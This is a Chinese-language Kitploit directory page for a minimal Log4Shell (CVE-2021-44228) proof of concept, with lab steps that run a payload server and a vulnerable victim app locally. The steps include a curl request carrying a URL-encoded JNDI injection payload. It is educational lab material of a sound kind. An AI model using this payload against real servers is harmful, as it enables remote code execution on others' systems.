Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
log4j2-rce-poc — 一个极简的 Log4j2 JNDI RCE 漏洞(CVE-2021-44228/Log4Shell)概念验证。 | Kitploit
工具/GitHubGitHub/unlimitedsola/log4j2-rce-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用学习与教育远程访问工具
GitHubunlimitedsola/log4j2-rce-poc

log4j2-rce-poc

一个极简的 Log4j2 JNDI RCE 漏洞(CVE-2021-44228/Log4Shell)概念验证。

查看仓库
324年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4j2 RCE 漏洞 POC

这是针对 Log4j2 JNDI 远程代码执行漏洞(CVE-2021-44228)的极简概念验证。它 旨在用于教育目的,帮助非安全研究人员了解其工作原理以及 影响范围有多大。

该 POC 绕过了将 com.sun.jndi.rmi.object.trustURLCodebase 和 com.sun.jndi.cosnaming.object.trustURLCodebase 属性设置为 true 的要求, 这些属性自 8u121、7u131、6u141 起默认被禁用 。

先决条件

  • JDK 1.8

注意:payload-server 编译需要 JDK 1.8,但 victim-app 在 JDK 15 之前均存在漏洞, 因为 Nashorn 引擎在 JDK 15 中被移除。

测试步骤

  1. 启动 payload-server,运行:
root@kitploit:~
$ ./gradlew runPayloadServer
  1. 打开一个新的终端会话,然后启动 victim-app:
root@kitploit:~
$ ./gradlew runVictimApp
  1. 运行 curl http://localhost:8080/hello?name=%24%7Bjndi%3Armi%3A%2F%2F127.0.0.1%3A8099%2Fexec%7D 以触发 RCE。
  2. 为了证明远程代码已被执行,请检查 victim-app 的控制台日志。你应当会在屏幕上看到一条非预期日志 被打印出来。
下载工具